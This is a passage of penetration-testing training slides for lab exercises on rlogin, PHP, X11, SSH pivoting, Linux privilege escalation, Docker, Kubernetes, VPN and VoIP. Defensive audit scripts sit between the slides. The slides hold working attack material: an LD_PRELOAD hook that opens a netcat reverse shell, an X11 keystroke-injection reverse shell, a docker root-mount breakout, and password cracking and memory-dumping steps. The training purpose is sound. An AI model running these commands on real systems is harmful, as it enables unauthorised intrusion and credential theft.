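    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        entries.append(TrustEntry(fields[0], fields[1] if len(fields) > 1 else None))
    return entries


def _entry_matches(entry, remote_host, remote_user, local_user):
    host_ok = entry.host == "+" or entry.host.lower() == remote_host.lower()
    if entry.user is None:
        # host-only line (assumed classic rule): same username required on both ends
        user_ok = remote_user == local_user
    else:
        # a named (or '+') remote user may log in as any local account
        user_ok = entry.user == "+" or entry.user == remote_user
    return host_ok and user_ok


def rlogin_allowed(hosts_equiv, rhosts, remote_host, remote_user, local_user):
    """Return the file that grants the login ('hosts.equiv' or '.rhosts'), or None."""
    if local_user != "root":  # assumed classic rule: hosts.equiv is never used for root
        if any(_entry_matches(e, remote_host, remote_user, local_user)
               for e in parse_trust_file(hosts_equiv)):
            return "hosts.equiv"
    if any(_entry_matches(e, remote_host, remote_user, local_user)
           for e in parse_trust_file(rhosts)):
        return ".rhosts"
    return None


def wildcard_entries(text):
    """Audit helper: entries that trust any host or any user."""
    return [e for e in parse_trust_file(text) if "+" in (e.host, e.user)]
```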
LAB Time Challenges 6.4
• Which file manages authentication for rservices such as rlogin/rsh etc?
Using access gained in the previous exercise:
• Examine the contents of the identified file and login to the host
192.168.X.209 using the ‘rlogin’ service
• Which users you can log on as using the rlogin service on the host
192.168.X.209?
Apache
● The most widely known open source web server
● Main security issues revolve around Apache modules, patching and
configuration
● Allows modules to extend functionality i.e. supporting programming
languages such as PHP, or features like per user html directories and
more
Apache Modules: userdir
● Multi user system can have the module userdir enabled which
allows every user to run a website via their own home folder
● mod_userdir requires the user to have a directory named as
public_html, i.e. /home/<username>/public_html
● This can be accessed by: http://IP/~<username>/<file_name>
Server Hardening
● There are multiple areas which should be investigated:
○ File system permissions (write access to webroot)
○ Process execution (running apache as root?)
○ Restricting supported modules / languages (userdir, PHP etc)
PHP Hardening
● Version <6: use Suhosin (https://suhosin.org)
● Version >6 (7.X)
○ Suhosin is not production ready, nor close to working
○ Limiting options via php.ini (disable_functions, disable_classes)
PHP Hardening: Bypasses
● Various PHP functions that can be used for code execution:
○ exec
○ system
○ passthru
○ popen
○ shell_exec
○ proc_open
○ dl
○ pcntl_exec (only usable on command line)
PHP Hardening: Feature Abuse
● The putenv function allows PHP to set environment variables
● The mail function performs mail operations on Unix systems by calling the /usr/bin/mail executable (use strace on PHP to identify the flow)
● The LD_PRELOAD environment variable allows:
○ Dynamic library loading to override function calls
○ Useful to override specific features and obtain better control over the application
● Compiling the shared object:
gcc -shared -fPIC hook.c -o hook.so
Feature Abuse: Sample Code
Shared Library Code (hook.c):
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
/* Replaces libc's geteuid(), which the mail binary calls; LD_PRELOAD is
   removed so child processes are not hooked again */
int geteuid() {
    if (getenv("LD_PRELOAD") == NULL) { return 0; }
    unsetenv("LD_PRELOAD");
    system("rm /tmp/1298;mkfifo /tmp/1298;cat /tmp/1298|/bin/bash -i 2>&1|nc <IP_ADDRESS> <PORT> >/tmp/1298");
    return 0;
}

Invoking PHP Code:
<?php
putenv("LD_PRELOAD=/home/foo/public_html/hook.so");
mail("a","a","a","a");
?>
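A defender-side check for the two PHP hardening slides above, added here as an example (not code from the course material): it parses a php.ini disable_functions line and reports which of the listed code-execution functions remain callable, and whether putenv (the start of the LD_PRELOAD chain in the sample code) is still available. Both ini texts are constructed samples.

```python
"""Check a php.ini disable_functions list against the code-execution functions
and the putenv/mail feature-abuse chain described above.

Added example, not part of the course material: parse_disable_functions()
reads php.ini text (comments, quoting and whitespace tolerated; the last
disable_functions line is the one that counts, as in PHP); audit() reports
which listed functions a script could still call. Both ini texts are
constructed samples."""
import re

# Code-execution functions from the "PHP Hardening: Bypasses" slide.
EXEC_FUNCTIONS = {"exec", "system", "passthru", "popen", "shell_exec",
                  "proc_open", "dl", "pcntl_exec"}


def parse_disable_functions(ini_text: str) -> set:
    """Return the set of function names the ini text disables."""
    disabled = set()
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()  # ';' starts a php.ini comment
        m = re.match(r"disable_functions\s*=\s*(.*)$", line, re.IGNORECASE)
        if m:
            value = m.group(1).strip().strip("\"'")
            disabled = {f.strip().lower() for f in value.split(",") if f.strip()}
    return disabled


def audit(ini_text: str) -> dict:
    """Which execution functions remain callable, and whether the putenv()
    LD_PRELOAD route from the Feature Abuse slide is still open."""
    disabled = parse_disable_functions(ini_text)
    return {
        "exec_still_enabled": sorted(EXEC_FUNCTIONS - disabled),
        # mail() itself is usually needed by the application; removing putenv()
        # is what stops an LD_PRELOAD=... environment reaching the mail binary
        "ld_preload_chain_open": "putenv" not in disabled,
    }


WEAK_INI = """; constructed sample: a partial blocklist
disable_functions = exec,system,passthru,shell_exec
"""

HARDENED_INI = """; constructed sample: the full list from the slides plus putenv
disable_functions = "exec, system, passthru, popen, shell_exec, proc_open, dl, pcntl_exec, putenv"
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit(ini))
```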
Exercise | Demo 6.5
• Read the file /home/foo/secret.txt on the host 192.168.X.209
• Obtain a reverse shell via the webserver (id=www-data)
Bonus:
• List at least 2 attack vectors for reading the aforementioned file
Hacking X11
● X11, when exposed, allows you to remotely connect and perform
operations (capture/send keystrokes, grab screenshots)
● Two basic access control mechanisms:
○ xhost: enables/disables host-based ACLs on the server; + and - are used to grant/revoke access for a host. xhost + (with no host given) means wildcard access is allowed
○ xauth: cookie-based access control mechanism
● Get Screenshot:
○ xwd -root -display 192.168.X.209:0 > output.raw
Hacking X11: Sending Keystrokes
● Focus on specific server (setting environment variables):
export DISPLAY=192.168.X.209:0
● Type keystrokes:
xdotool type "nc 192.168.X.206 5555 -n -e /bin/bash"
● Send special characters:
xdotool key KP_Enter
http://www.semicomplete.com/projects/xdotool/xdotool.xhtml
Hacking X11: Kill Screensaver Remotely
● If you take a screenshot and it's a black image, a screensaver is most likely enabled
xwininfo -root -children -display 192.168.X.209:0
{snip}
0x3200001 "gnome-screensaver": ("gnome-screensaver" "Gnome-screensaver")  10x10+10+10  +10+10
xkill -display 192.168.X.209:0 -id 0x3200001
Exercise | Demo 6.6
• On what port is the X11 service running?
• Identify and exploit a flaw in the X11 service by obtaining a screenshot
of the desktop on remote host 192.168.X.209
• Obtain a reverse shell by exploiting this vulnerability
SSH Pivoting and Tunnelling
• Port forwarding:
– Dynamic port forwarding
– Local port forwarding
– Reverse port forwarding
• Port forwarding works even if your shell is set to nologin or false
• ssh -N connects without requesting a shell
• ssh -g allows remote hosts to connect to locally forwarded ports
Dynamic Port Forwarding
• ssh -D 8786 username@internal_box (using password)
Local Port Forwarding
• ssh -L <local_port>:Target_Box_IP:<target_port> username@whitelisted_host
Example: ssh -L 8000:192.168.3.210:80 root@192.168.X.206
Reverse Port Forwarding
• ssh -R <remote_port>:localhost:<local_port> username@internal_box
Example: ssh -R 18888:localhost:8085 username@internal_box
• Run a SOCKS proxy on localhost port 8085
• Run proxychains on the 'Internal Box'
cat /etc/proxychains.conf
socks5 127.0.0.1 18888
• Execute a command through the proxy
proxychains curl https://google.com
Exercise 6.7
• Read the databases and identify the value of the flag in MongoDB
Bonus: Access MongoDB on 192.168.X.209 from your Kali machine / base (delegate machine) using the various tunnelling techniques discussed
Note: Remember MongoDB from the database discussion in Module 3
Linux Privilege Escalation
Local Privilege Escalation
● Remember: There are multiple ways to get root!
○ Enumerate, collect and analyse information
● Weak file permissions; for example:
○ Accessible sensitive files /etc/shadow, /etc/passwd, .bash_history etc
○ Misconfigured services such as cron jobs, inetd, etc.
○ Writable files/directories
● Weak passwords (via /etc/shadow, sucrack to crack local user accounts)
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Local Privilege Escalation
• Kernel exploits
• Sudo misconfiguration
– sudo -l lists the allowed commands
– Look for potential misconfigurations
• Passwords in files
• Misconfigured services
• Weak permissions/configuration on SUID files, scripts etc.
• Poorly configured cron jobs
• LD_PRELOAD
– Function overriding, as seen in Apache Exercise 6.5
• and many more...
LinEnum: Automated Enumeration
• Scripted Local Linux Enumeration & Privilege Escalation Checks
• https://github.com/rebootuser/LinEnum
• Performs large array of checks in an automated manner
• Easier to identify most common attack paths
Alternative: http://pentestmonkey.net/tools/audit/unix-privesc-check
Exercise | Demo 6.8
• Identify a file permission misconfiguration that will allow you to
escalate permissions
• Obtain root access by exploiting this flaw
Getting Root: FAILSAFE
If, for any reason, you have not managed to gain SSH access as foo, the following
failsafe has been put into place
• Username: root
• Password: abc1234 (yup, it was brute-forcible)
IMPORTANT: Within the following challenges you will be required to substitute the
SSH key for this password
Local Privilege Escalation: Kernel Exploits
• From time to time kernel vulnerabilities are discovered and exploits are
publicly released
• Compile and run; as simple as that!
Post Exploitation: What Next?
• Remember everything is a file - look inside /etc/
• Networks: /sbin/ifconfig, ip link
• Look at history or other files in the home directory
– find /home -type f -iname '.*history'
• Look at ssh keys in /home/<user>/.ssh/
• Look at firewall rules : iptables -L
• Look at open files : lsof -nPi
• Active connections : netstat -nltupw
• Arp : arp -a
• Route: route -n
More: https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
Post Exploitation: Credential Extraction
We can further exploit the system to gain access to user credentials such as those in /etc/shadow. These are hashed passwords and need to be brute-forced.
• mimipy / mimipenguin
– This tool dumps process memory and uses it to build a wordlist for brute-forcing the shadow file
– It can also help extract passwords from memory
– Result: insanely fast plaintext credential retrieval
• 3snake
– https://github.com/blendin/3snake
– Dumps the password from active process memory (SSH)
Exercise | Demo 6.9
• Obtain the cleartext password for ‘foo’ user
Module 7
Docker
Why Docker
• Removes the “It works on my System” syndrome
• Easy & quick to setup environments and test beds
• Loved by start-ups and by PoC development teams
• Loved by Google and the like for scalability and ease of deployment
• As secure as you configure it!
How Does Docker Work?
• Docker normally runs as a service with elevated privileges (YAY!)
• Docker image is downloaded from a public hub (Docker Hub) or a private
hub
• Image is provided a set of options and executed
• The image may expose ports to other containers or to the external
network
• Docker provides an internal network for all containers on the same host
Docker: For Pentesters
• From outside it will appear as any other system
• /proc/1/cgroup will show docker references
• pid 1 != init / launchd
Docker: For Pentesters
• Bash / Python / Perl aren't usually available
• Containers are disposable, so persistence is not guaranteed
• Containers can have different resources shared
• Container crash === new spawn anywhere
• Docker internal network (172.17.0.0/16)
– https://docs.docker.com/engine/userguide/networking/
• Video: https://youtu.be/V42OQd7p-7Y
Docker: Running Container Process as Root
• By default host UID == container UID
• Root in container == root on base box
• If a file system is shared, you may have a direct path to get root
• docker run -itv /:/host alpine /bin/sh
– i: interactive
– t: allocate a pseudo TTY
– v: bind mount a volume
Docker: Exposing Docker Socket/TCP
• Docker socket == access to docker daemon
• Docker could listen on port 2375 (no auth) or 2376 (TLS)
– https://docs.docker.com/engine/reference/commandline/dockerd/#examples
• Generally: Dashboard or reporting application containers
• Misconfiguration, (un)intended exposure == compromise
• Video: https://youtu.be/6q7TBbUylbw
Docker: Unpatched Host /Guest
• Docker shares the kernel with the host
• Kernel bugs could result in host compromise
• Video: https://youtu.be/y7XoIOhWStc
Docker: Common Commands
Docker System Information
• docker system info
List running containers
• docker ps
Run a container
• docker run -it <image_name> <binary_path>
Enumerate various details
• docker [container|service|stack|plugin] ls
Enumerate images
• docker images
Exercise 7: Docker Breakout
• Identify ways to run Docker containers on 192.168.X.209 using the
limited user accounts “foo” or “foo2”
• Identify containers and images available on the system
• Obtain root ssh access to 192.168.X.209 using docker and read
/etc/pwn.txt on the host
Docker: Secure Configuration
• Docker security relies on secure configuration at all levels
– Scrutinize “docker” group
– Docker Socket: only available to root and docker group users
– Docker daemon: only available to root and docker group users
– Docker containers: run processes via limited users
– Docker host and guest: keep up-to-date
• Scan Docker configuration files
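A configuration-review check for the "Running Container Process as Root" and "Secure Configuration" slides, added here as an example (not code from the course material or from Docker): it walks `docker inspect` records and flags a root user, privileged mode, and host paths bind-mounted into the container. The two records are constructed to mimic the inspect JSON layout; the first mirrors the `docker run -itv /:/host alpine /bin/sh` case.

```python
"""Review docker inspect output for the settings the Docker slides call out:
a process running as root, the host filesystem (or the daemon socket)
bind-mounted into the container, and privileged mode.

Added example, not part of the course material: audit_container() walks one
record from `docker inspect <container>` (Config.User, HostConfig.Privileged,
Mounts). The two records below are constructed to mimic that JSON layout."""
import json

# Host paths whose bind mount hands a container a direct route to root.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys", "/var/run/docker.sock")


def _is_sensitive(source: str) -> bool:
    source = source.rstrip("/") or "/"
    return any(source == p or (p != "/" and source.startswith(p + "/"))
               for p in SENSITIVE_HOST_PATHS)


def audit_container(record: dict) -> list:
    """Return human-readable findings for one inspect record ([] = clean)."""
    findings = []
    # Config.User is "" when no user was set: the process runs as UID 0,
    # which (without user namespaces) is UID 0 on the host as well
    user = (record.get("Config", {}).get("User") or "").split(":")[0]
    if user in ("", "0", "root"):
        findings.append("process runs as root (container UID 0 == host UID 0)")
    if record.get("HostConfig", {}).get("Privileged"):
        findings.append("privileged mode (all capabilities, host devices)")
    for mount in record.get("Mounts", []):
        src, dst = mount.get("Source", ""), mount.get("Destination", "")
        if mount.get("Type") == "bind" and _is_sensitive(src):
            mode = "rw" if mount.get("RW", True) else "ro"
            findings.append(f"host path {src} bind-mounted at {dst} ({mode})")
    return findings


def audit_all(records: list) -> dict:
    """Map container name -> findings for a whole `docker inspect` array."""
    return {r.get("Name", r.get("Id", "?")): audit_container(r) for r in records}


# Constructed sample in the shape docker inspect prints (not a real host).
SAMPLE_INSPECT = json.loads("""[
  {"Id": "constructed-0001", "Name": "/breakout",
   "Config": {"User": "", "Image": "alpine"},
   "HostConfig": {"Privileged": false},
   "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host", "RW": true}]},
  {"Id": "constructed-0002", "Name": "/reporting",
   "Config": {"User": "1000:1000", "Image": "reporting-app"},
   "HostConfig": {"Privileged": false},
   "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/rep/_data",
               "Destination": "/data", "RW": true}]}
]""")

if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_INSPECT).items():
        print(name, findings or ["no findings"])
```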
Docker: Configuration Review
• Docker Security Scanning via DockerHub :
https://docs.docker.com/docker-cloud/builds/image-scan/
• Clair : https://github.com/coreos/clair
• Atomic Scan:
https://developers.redhat.com/blog/2016/05/02/introducing-atomic-scan-container-vulnerability-detection/
• https://anchore.com/
• Dockerscan : https://github.com/cr0hn/dockerscan
• Dockscan: https://github.com/kost/dockscan
• Nessus: https://www.tenable.com/blog/auditing-docker-with-nessus-66
Vulnerable Docker VM
• We have created a vulnerable docker VM that suffers from many of the
vulnerabilities discussed throughout this session.
• This is available to download from the following URL:
https://www.notsosecure.com/vulnerable-docker-vm/
Kubernetes
Open-source system for automating deployment, scaling, and management of containerized applications
Kubernetes: Basics
• Pod - A group of containers, runs in a shared context
• Labels - Labels for identifying pods
• Kubelet - Container agent
• Proxy - A load balancer for pods
• etcd - Metadata service (key-value store)
• Replication Controller – Manage replication of pods
Kubernetes: Security Overview
• Doesn't have any security by default for versions 1.5 and below
• Kubernetes introduced the RBAC & ABAC models in version >=1.5
• By default, unless specified otherwise, everything in a container runs as root
• Access to etcd is open by default
• Lots of security misconfigurations
Kubernetes: Ports
Port/Protocol        Description
• 6443 TCP           Kubernetes API server (master only)
• 2379-2380 TCP      etcd server client API (master only)
• 10250 TCP          Kubelet API
• 10251 TCP          kube-scheduler (master only)
• 10252              kube-controller-manager (master only)
• 10255              Read-only Kubelet API
• 30000-32767 TCP    NodePort services (client only)
Kubernetes: Enumeration
• List kubernetes details
kubectl cluster-info
• List all the resources
kubectl get all   (pods, namespaces, services)
• Prints all information about the individual pod|service|deployment
kubectl describe pod|service|deployment <name>
• Runs an nginx as deployment
kubectl run nginx --image=nginx
• Creates a kubernetes resource based on the file configuration
kubectl create -f ./input_file.yaml
Kubernetes: Attack Surface
• Identify the current user in the pod; root == a good chance the system is compromised
• Identify the various services exposed on the network / localhost
– 10250: API (kubelet exploit)
– API read/write access == full pwnage
• Identify the list of running pods using the API
curl -sk https://192.168.99.101:10250/runningpods/ | python -mjson.tool
• Identify if the token is accessible
/var/run/secrets/kubernetes.io/serviceaccount/token
• Token / API gives direct access to interact with the base machine
Kubernetes: Tricks
• To create your own kube node
kubectl create -f test.yml
• Execute code or run shell from a specific container
kubectl exec <pod_name> -c <container_name> -i -t -- <shell>
• Copies files to and from nodes
kubectl cp <some-namespace>/<some-pod>:/tmp/foo /tmp/bar
Network Status: After a Barrage of Linux Sploits!
Module 8
VPN Hacking
VPN: Virtual Private Network
VPN: Types
● PPTP
○ Easy to configure, fast, and the weakest in regards to security
○ MS-CHAPv1 has been broken for 15+ years
○ Unencapsulated MS-CHAPv2 authentication
○ What else? MS says use L2TP with IPSec, or SSTP
● L2TP/IPSec
○ L2TP can be run over non-IP networks (frame relay, ATM, etc.)
○ L2TP encapsulates the data and...
○ ...the IPSec connection is used to transport this data
● 'Others'
○ Secure Socket Tunnelling Protocol (SSTP), OpenVPN
VPN: Services
General Ports/Protocols:
○ PPTP - 1723/TCP
○ L2TP - 1701/UDP
○ IPSec
■ 500/UDP (IKE)/ 500/TCP (IKE over TCP sometimes)
■ IP protocol 50 (Encapsulating Security Payload - ESP) and 51
(Authentication Header - AH)
■ 4500/UDP (NAT Traversal)
○ SSTP/OpenVPN/SSL VPNs
■ 443/TCP
VPN: IPSec Hierarchy
VPN: IKE Connection Mode
● IKE Phase 1 occurs in two modes:
○ Main Mode (6 packet exchange)
○ Aggressive Mode (3 packet exchange)
● Authentication and key exchange is a two phase process:
○ Phase 1 - authenticates and establishes a secure channel known as the IKE SA
○ Phase 2 - negotiates the IPSec mode and sets up the secure channel for AH/ESP traffic, known as the IPSec SA
VPN: Main Mode vs Aggressive Mode
Image source: http://rayas-security.blogspot.co.uk
VPN: Attribute Selection
• The first mutually acceptable attribute is selected for use
VPN: IKE-Scan
● An SA payload contains a single proposal, containing eight transforms:
Enc (2) x Hash (2) x Auth (1) x Group (2) x Lifetime (1) = 2x2x1x2x1 = 8 transforms (basically combinations)
● Transform attributes - the 8 transforms represent the following attribute combinations (IKE default proposal):
○ Enc: DES or Triple DES
○ Hash: MD5 or SHA1
○ Auth: Pre-Shared Key
○ Group: 1 (modp768) or 2 (modp1024)
○ SA Lifetime: 28800 seconds
VPN: IKE-Scan
● Enumeration - Fingerprinting, Vendor information (VID), id/group names etc.
● Be aware - the PSK may not be enough on its own!
● Authentication mechanisms (relevant to this example):
○ PSK
○ XAUTH - provides an additional level of authentication by requesting extended
authentication from users, thus forcing remote users to respond with their
credentials before being allowed access to the VPN (http://www.ciscopress.com)
VPN: IKE-Scan
● Useful switches:
--sport=<p>    set the UDP source port to <p>, default=500
--trans=<t>    use custom transform <t> instead of the default set
--id=<id>      the identification value. This option is only applicable to Aggressive Mode
--auth=<n>     set the auth method to <n>, default=1 (PSK); XAUTH uses 65001 to 65010
-P<location>   output the aggressive mode PSK parameters for offline cracking
A very handy reference: http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide
VPN: Attack Methodology
• Identify a VPN server
– nmap and udp-proto-scanner
• Identify valid proposals / Identify handshake mode (main/aggressive)
– ike-scan
• Identify the authentication type (PSK/XAUTH etc.) and ID (dependent on server config)
• Capture and crack the PSK if aggressive mode is identified
– psk-crack
• Using the identified PSK, ID and 'other' credentials, log in to the VPN
– Strongswan, Openswan or another VPN client
• Attack the internal network!
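An added example covering the IKE-Scan transform slide and the "identify handshake mode / authentication" steps above (not code from the course material or from ike-scan): it multiplies out the default proposal into its eight transforms in ike-scan's numeric `--trans` form, and classifies one ike-scan result line into the findings a report would carry. The result line is constructed in ike-scan's output style; the attribute numbers are IKEv1 values from RFC 2409.

```python
"""Expand the IKE default proposal into its eight transforms and classify
an ike-scan result line.

Added example, not part of the course material or of ike-scan itself:
enumerate_default_transforms() multiplies out the Enc/Hash/Auth/Group/
Lifetime attributes listed above and renders each as the numeric
--trans=enc,hash,auth,group value ike-scan accepts (IKEv1 attribute numbers
from RFC 2409); classify_result() reads one result line and flags the
aggressive-mode + PSK combination that makes the PSK crackable offline.
The result line below is constructed in ike-scan's output style."""
import itertools
import re

# IKEv1 attribute values (RFC 2409 / IANA IPsec registry).
ENC = {"DES": 1, "3DES": 5}
HASH = {"MD5": 1, "SHA1": 2}
AUTH = {"PSK": 1}
GROUP = {"modp768": 1, "modp1024": 2}
LIFETIME = {"28800s": 28800}


def enumerate_default_transforms() -> list:
    """Return [((enc, hash, auth, group, lifetime), "--trans value"), ...];
    len() is 2*2*1*2*1 = 8, matching the slide's count."""
    out = []
    for enc, hsh, auth, grp, life in itertools.product(ENC, HASH, AUTH, GROUP, LIFETIME):
        trans = f"{ENC[enc]},{HASH[hsh]},{AUTH[auth]},{GROUP[grp]}"
        out.append(((enc, hsh, auth, grp, life), trans))
    return out


# e.g. "192.168.3.211  Aggressive Mode Handshake returned HDR=(...) SA=(Enc=3DES ...)"
RESULT_RE = re.compile(
    r"^(?P<ip>\S+)\s+(?P<mode>Main|Aggressive) Mode Handshake returned"
    r".*?SA=\((?P<sa>[^)]*)\)"
)


def classify_result(line: str) -> dict:
    """Parse one ike-scan result line into report-ready findings."""
    m = RESULT_RE.search(line)
    if not m:
        return {"responder": False}
    attrs = dict(kv.split("=", 1) for kv in m.group("sa").split())
    aggressive = m.group("mode") == "Aggressive"
    auth = attrs.get("Auth", "")
    group = attrs.get("Group", "")
    return {
        "responder": True,
        "ip": m.group("ip"),
        "mode": m.group("mode"),
        "auth": auth,
        "group": group,
        # groups 1 and 2 are 768/1024-bit MODP, well below current guidance
        "weak_group": group.startswith(("1:", "2:")),
        # aggressive mode returns the PSK-derived hash before the channel is
        # protected, which is the "crack the PSK" step in the methodology
        "psk_offline_crackable": aggressive and auth == "PSK",
    }


# Constructed sample in ike-scan's result format (not a real capture).
SAMPLE_RESULT = (
    "192.168.3.211\tAggressive Mode Handshake returned "
    "HDR=(CKY-R=0011223344556677) "
    "SA=(Enc=3DES Hash=SHA1 Auth=PSK Group=2:modp1024 LifeType=Seconds "
    "LifeDuration=28800) KeyExchange(128 bytes) Nonce(20 bytes) "
    "ID(Type=ID_USER_FQDN, Value=constructed-group) Hash(20 bytes)"
)

if __name__ == "__main__":
    for combo, trans in enumerate_default_transforms():
        print(" ".join(combo), "->", "--trans=" + trans)
    print(classify_result(SAMPLE_RESULT))
```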
VPN: Preparation
● Ensure we have a VPN client to hand (Strongswan)
● Configuration Sample ~/Tools/VPN_Config/
● Copy the sample config files to /etc/ipsec.conf and /etc/ipsec.secrets on your
attacking host
● Crack the PSK
psk-crack -d <dictionary> capture_file
● Amend the file /etc/ipsec.secrets to reflect your findings!
● Connect to the VPN (ipsec up vpn)
VPN: What We Need to Know...
● We need to know the following:
○ PSK
○ ID/group name
○ Authentication type
● However, we can't make a connection as we still need XAUTH credentials!
● Within ~/Tools/VPN_Config/ you'll find:
○ brute-xauth.sh
○ ipsec_conf_sample
○ ipsec_secrets_sample
● Play ;-)
Exercise | Demo 8.1
• Identify a VPN service running on 192.168.3.211
• Identify a misconfiguration with the host
• Obtain the ID/group name
• Crack the PSK
LAB Time Challenges (continuing 8.1)
• Use ~/Tools/VPN_Config/brute-xauth.sh to identify weak XAUTH
credentials
• Connect to the internal network
Bonus:
• On the VPN host, obtain access to the julie account
• On the VPN host, obtain access to the root account
Network Status: After VPN Exploitation
Module 9
VoIP Hacking
VoIP: Voice over IP
● Voice over IP
● Stays on the IP network end to end only if both ends are on an IP network
● IP-to-PSTN translation in case one end is on the PSTN
● Consists of:
○ Phone calls over IP
○ Voice messages/storage
○ Telephone connectivity over an IP network (internal/external)
VoIP: SIP Protocol (RFC 3261)
• Establish, manage and terminate VOIP sessions
https://www.ietf.org/rfc/rfc3261.txt
VoIP: SIP Request Methods
● Common SIP Request Methods (many more not included here):
INVITE   - Indicates a client is being invited to participate in a call session
ACK      - Confirms that the client has received a final response to an INVITE request
BYE      - Terminates a call; can be sent by either the caller or the callee
CANCEL   - Cancels any pending request
OPTIONS  - Queries the capabilities of servers
REGISTER - Registers the address listed in the To header field with a SIP server
*source: https://en.wikipedia.org/wiki/List_of_SIP_request_methods
VoIP: SIP Response Codes
● Common SIP response codes:
1xx - Provisional
2xx - Successful
3xx - Redirection
4xx - Client Failure
5xx - Server Failure
6xx - Global Failure
*source: https://en.wikipedia.org/wiki/List_of_SIP_request_methods
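An added example for the two SIP slides above (not code from the course material or from sipvicious): it parses a SIP response, maps the status code to the class listed above, and pulls out the User-Agent / Server identification and the request methods the server advertises in Allow. The reply text is constructed in the shape of an OPTIONS response, not captured from a real PBX.

```python
"""Parse a SIP response into the status class listed above and pull out the
fields the enumeration exercise asks for (User-Agent / PBX details and the
request methods the server advertises).

Added example, not part of the course material or of sipvicious: the message
is the kind of reply an OPTIONS probe (what svmap sends) elicits; the text
below is constructed, not captured from a real PBX."""
SIP_CLASSES = {1: "Provisional", 2: "Successful", 3: "Redirection",
               4: "Client Failure", 5: "Server Failure", 6: "Global Failure"}
# The request methods from the previous slide.
COMMON_METHODS = ["INVITE", "ACK", "BYE", "CANCEL", "OPTIONS", "REGISTER"]


def parse_sip_response(raw: str) -> dict:
    """Split status line, headers and body (SIP uses CRLF, blank line before body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    version, code, reason = lines[0].split(" ", 2)
    if not version.startswith("SIP/"):
        raise ValueError("not a SIP response: " + lines[0])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        # repeated headers (e.g. several Via or Allow lines) are comma-joined
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    allow = [m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()]
    code = int(code)
    return {
        "code": code,
        "class": SIP_CLASSES.get(code // 100, "Unknown"),
        "reason": reason,
        # Asterisk-style PBXs tend to identify themselves in Server: on
        # responses and User-Agent: on requests, so check both
        "user_agent": headers.get("user-agent") or headers.get("server"),
        "allowed_common": [m for m in COMMON_METHODS if m in allow],
        "allowed_other": [m for m in allow if m not in COMMON_METHODS],
        "body": body,
    }


# Constructed OPTIONS reply (documentation addresses, made-up tags).
SAMPLE_OPTIONS_REPLY = (
    "SIP/2.0 200 OK\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK-constructed;received=192.0.2.10\r\n"
    "From: \"sipvicious\" <sip:100@192.0.2.10>;tag=constructed\r\n"
    "To: <sip:100@192.0.2.20>;tag=as0constructed\r\n"
    "Call-ID: constructed-call-id@192.0.2.10\r\n"
    "CSeq: 1 OPTIONS\r\n"
    "Server: constructed-PBX/1.0\r\n"
    "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, PUBLISH\r\n"
    "Supported: replaces, timer\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    info = parse_sip_response(SAMPLE_OPTIONS_REPLY)
    print(info["code"], info["class"], info["user_agent"], info["allowed_common"])
```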
VoIP: Attack Surface
• Traffic might be sent over the Internet (or other untrusted network)
and could be intercepted
• Passwords are generally numeric in nature
• Most network firewalls are not VoIP aware (they either allow or block, or rate limit at best)
• Underlying remote admin protocols are too trusting
• Unpatched systems (why bother, they are internal?)
• Take it down (not in this lab at least!)
VoIP: Attack Methodology
• Identify VoIP endpoints, enumerate info such as extensions and SIP
Methods that are allowed
• Brute-force logins (Asterisk call manager)
• Extract VoIP user passwords
• Listen/retrieve voice messages
• Exploit web admin interfaces
• March towards root!
VoIP: Enumeration
● UDP Port Scan
● TCP Port Scan
Common Ports:
• SIP TCP/UDP 5060
• SIP over TLS TCP/UDP* 5061
*Note that TLS (the successor to SSL) can only be established over a TCP connection
Not So Common Ports**:
• Asterisk Call Manager TCP 5038
**Generally Call Manager functionality is only accessible via the localhost interface on an Asterisk PBX
VoIP: Enumeration
● svmap.py (part of sipvicious) can be used to identify more
details about the VoIP server
svmap <IP>
VoIP: Extensions and Methods
● svwar (part of sipvicious) can bruteforce various extensions
svwar -m <METHOD> -D <IP>
VoIP: Extensions and Methods
● Use extensions identified via svwar to brute-force
extension passwords
svcrack -u <ID> -d /usr/share/wordlists/dirb/others/best1050.txt <IP>
SIP Call Manager Login
● Login to VoIP call manager via telnet interface
(default/weak creds)
SIP Call Manager Commands
● Obtain a list of the available commands via the call
manager interface (useful resource http://www.voip-info.org/wiki/view/Asterisk+CLI)
action: ListCommands
VoIP: Impersonate VoIP Users
● Once we have the user extension and their secret, we can
impersonate the target and listen to their voicemails
● Use a SIP client that is specific to your OS:
○ Windows and Mac: X-Lite
○ Linux: Ekiga or Linphone
○ Cross platform: Zoiper
X-Lite : http://www.counterpath.com/x-lite-download/
VoIP: X-Lite and Linphone Client Configs
● X-Lite ● Linphone
Exercise | Demo 9.1
• What services are running on 192.168.3.210?
• Identify the port on which a SIP service is running and also identify the User-Agent (i.e. PBX details)
• Identify and attempt to crack passwords for some of the extensions available on the SIP server
• Identify the username and password for the call manager interface
• Using the above, identify the password for SIP user 200 (not 2000)
• Identify a user with voicemail access
• Connect and retrieve the voicemail message
• Based on the voicemail, identify the login credentials for a user account and gain admin access to the FreePBX web application
LAB Time Challenges (9.2)
• Gain root access on the VoIP server
Network Status: After VoIP Exploitation
Module 10
VLAN Hacking
The Basics
● Cisco’s definition of Virtual Local Area Network (VLAN)
“A VLAN is a group of devices on one or more LANs that are configured to
communicate as if they were attached to the same wire, when in fact they are
located on a number of different LAN segments. Because VLANs are based on
logical instead of physical connections, they are extremely flexible”
Understanding VLAN
● Why are these used?
